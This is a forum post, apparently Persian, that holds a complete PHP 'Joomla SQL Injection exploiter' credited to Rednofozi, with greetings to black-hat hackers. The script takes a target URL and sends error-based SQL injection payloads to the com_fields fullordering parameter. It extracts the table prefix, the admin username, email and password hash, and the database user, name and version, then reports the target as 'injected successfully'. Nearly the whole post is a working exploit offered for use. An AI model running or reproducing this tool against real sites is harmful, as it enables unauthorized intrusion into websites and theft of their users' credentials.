کد:
[COLOR=#000000] [COLOR=#0000BB]<?php session_start[/COLOR][COLOR=#007700](); [/COLOR][COLOR=#0000BB]error_reporting[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]set_time_limit[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#FF8000]/* Coded By Rednofozi*/ [/COLOR][COLOR=#0000BB]$head [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]' <html> <head> <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/> </script> <title>--==[[Mannu joomla SQL Injection exploiter by Rednofozi ]]==--</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <STYLE> body { font-family: Tahoma; color: white; background: #333333; } input { border : solid 2px ; border-color : black; BACKGROUND-COLOR: #444444; font: 8pt Verdana; color: white; } submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: Black; width: 30%; color: #FFF; } #t input[type="submit"]{ COLOR: White; border:none; BACKGROUND-COLOR: black; } #t input[type="submit"]:hover { BACKGROUND-COLOR: #ff9933; color: black; } tr { BORDER: dashed 1px #333; color: #FFF; } td { BORDER: dashed 0px ; } .table1 { BORDER: 0px Black; BACKGROUND-COLOR: Black; color: #FFF; } .td1 { BORDER: 0px; BORDER-COLOR: #333333; font: 7pt Verdana; color: Green; } .tr1 { BORDER: 0px; BORDER-COLOR: #333333; color: #FFF; } table { BORDER: dashed 2px #333; BORDER-COLOR: #333333; BACKGROUND-COLOR: #191919;; color: #FFF; } textarea { border : dashed 2px #333; BACKGROUND-COLOR: Black; font: Fixedsys bold; color: #999; } A:link { border: 1px; COLOR: red; TEXT-DECORATION: none } A:visited { COLOR: red; TEXT-DECORATION: none } A:hover { color: White; TEXT-DECORATION: none } A:active { color: white; TEXT-DECORATION: none } </STYLE> <script type="text/javascript"> <!-- function lhook(id) { var e = document.getElementById(id); if(e.style.display == "block") e.style.display = "none"; else e.style.display = "block"; } //--> </script> '[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#0000BB]$head [/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]' <table width="100%" cellspacing="0" cellpadding="0" class="tb1" > <td width="100%" align=center valign="top" rowspan="1"> <font color=#ff9933 size=5 face="comic sans ms">--==[[ Mannu ]]==--</font><br><font color=#ff9933 size=3 face="comic sans ms">--==[[ Joomla </font><font color=white size=3 face="comic sans ms">SQL Injection exploiter By Team </font><font color=green size=3 face="comic sans ms"> INDIShEll]]==--</font> <div class="hedr"> <td height="10" align="left" class="td1"></td></tr><tr><td width="100%" align="center" valign="top" rowspan="1"><font color="red" face="comic sans ms"size="1"><b> <font color=#ff9933> ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white> -==[[Greetz to]]==--</font><br> <font color=#ff9933>ReZa CLONER , Moeein Seven <br#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow<br> <font color=white>--==[[Love to]]==--</font><br>black hat hackers ,iran hackers <br> <font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Rednofozi:D</font> <br></font> <b> <font color=#ff9933> ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font> </table> </table> '[/COLOR][COLOR=#007700]; function [/COLOR][COLOR=#0000BB]unhex[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$hex[/COLOR][COLOR=#007700]){ for([/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];[/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]<[/COLOR][COLOR=#0000BB]strlen[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$hex[/COLOR][COLOR=#007700]);[/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]+=[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]) [/COLOR][COLOR=#0000BB]$str [/COLOR][COLOR=#007700].= [/COLOR][COLOR=#0000BB]chr[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]hexdec[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]substr[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$hex[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]))); return [/COLOR][COLOR=#0000BB]$str[/COLOR][COLOR=#007700]; } function [/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$lu[/COLOR][COLOR=#007700]) { [/COLOR][COLOR=#0000BB]$ch [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]curl_init[/COLOR][COLOR=#007700](); [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_URL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$lu[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_HTTP_VERSION[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURL_HTTP_VERSION_1_0[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_HEADER[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_RETURNTRANSFER[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_CONNECTTIMEOUT[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]5[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_SSL_VERIFYPEER[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]false[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_USERAGENT[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$result[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'EXE'[/COLOR][COLOR=#007700]] = [/COLOR][COLOR=#0000BB]curl_exec[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]curl_close[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700]); return [/COLOR][COLOR=#0000BB]$result[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'EXE'[/COLOR][COLOR=#007700]]; } [/COLOR][COLOR=#0000BB]?> [/COLOR] [/COLOR] <div align=center> <img src=""> <font size=4 color=white face="comic sans ms">--==[[ code for Rednofozi ]]==-- </font> <img src=""> <br><br> <form method=post> <input type=input name=in value=target> <input type=submit name=sm value="Exploit it"> </form> [COLOR=#000000] [COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sm'[/COLOR][COLOR=#007700]])) { [/COLOR][COLOR=#0000BB]$target[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'in'[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$target[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]'/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]='[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$payload[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,hex(table_name),0x7e7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1)))=1'[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$payload[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$def[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$table_name[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]unhex[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$def[/COLOR][COLOR=#007700]); echo [/COLOR][COLOR=#DD0000]'Table names used for grabbing database table prefix ->'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$table_name[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'<br>'[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$prefix[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'_'[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]$table_name[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$total_char[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]10[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$start[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$loop_end[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]false[/COLOR][COLOR=#007700]; while([/COLOR][COLOR=#0000BB]$loop_end[/COLOR][COLOR=#007700]!=[/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700]) { [/COLOR][COLOR=#0000BB]$payload2[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$start[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]','[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$total_char[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]'),0x7e7e7e)/**/from/**/'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$prefix[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]].[/COLOR][COLOR=#DD0000]'_users/**/limit/**/0,1)))=1'[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$payload2[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$ddd[/COLOR][COLOR=#007700].=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]); if([/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]])==[/COLOR][COLOR=#DD0000]''[/COLOR][COLOR=#007700]) { break; [/COLOR][COLOR=#0000BB]$loop_end[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700]; } [/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]+[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$start[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$start[/COLOR][COLOR=#007700]+[/COLOR][COLOR=#0000BB]10[/COLOR][COLOR=#007700]; } [/COLOR][COLOR=#0000BB]$username[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$prefix[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]].[/COLOR][COLOR=#DD0000]'_users/**/limit/**/0,1)))=1'[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$username[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$user_name[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$prefix[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]].[/COLOR][COLOR=#DD0000]'_users/**/limit/**/0,1)))=1'[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$dbuser[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1'[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$dbuser[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$db_user[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$dbname[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1'[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$dbname[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$db_name[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$dbversion[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1'[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$dbversion[/COLOR][COLOR=#007700]; [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]$db_version[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]); if([/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700]!=[/COLOR][COLOR=#DD0000]'' [/COLOR][COLOR=#007700]|| [/COLOR][COLOR=#0000BB]$user_name[/COLOR][COLOR=#007700]!=[/COLOR][COLOR=#DD0000]'' [/COLOR][COLOR=#007700]|| [/COLOR][COLOR=#0000BB]$ddd[/COLOR][COLOR=#007700]!=[/COLOR][COLOR=#DD0000]''[/COLOR][COLOR=#007700]) { echo [/COLOR][COLOR=#DD0000]'Target <a href="'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$target[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]'">'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$target[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]'</a> has been injected successfully, find username, email and password given below<br><br>'[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'<table width=80% style="border:0px; background-color : transparent;">'[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Database username is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$db_user[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Database name is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$db_name[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Database version is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$db_version[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Username is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$user_name[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Email is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Password hash is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$ddd[/COLOR][COLOR=#007700]; echo [/COLOR][COLOR=#DD0000]'</font></td></tr></table>'[/COLOR][COLOR=#007700]; } } [/COLOR][COLOR=#0000BB]?> [/COLOR] [/COLOR] |--------------------------------------------------------------| **************************************************************** Discovered by : Rednofozi
کامنت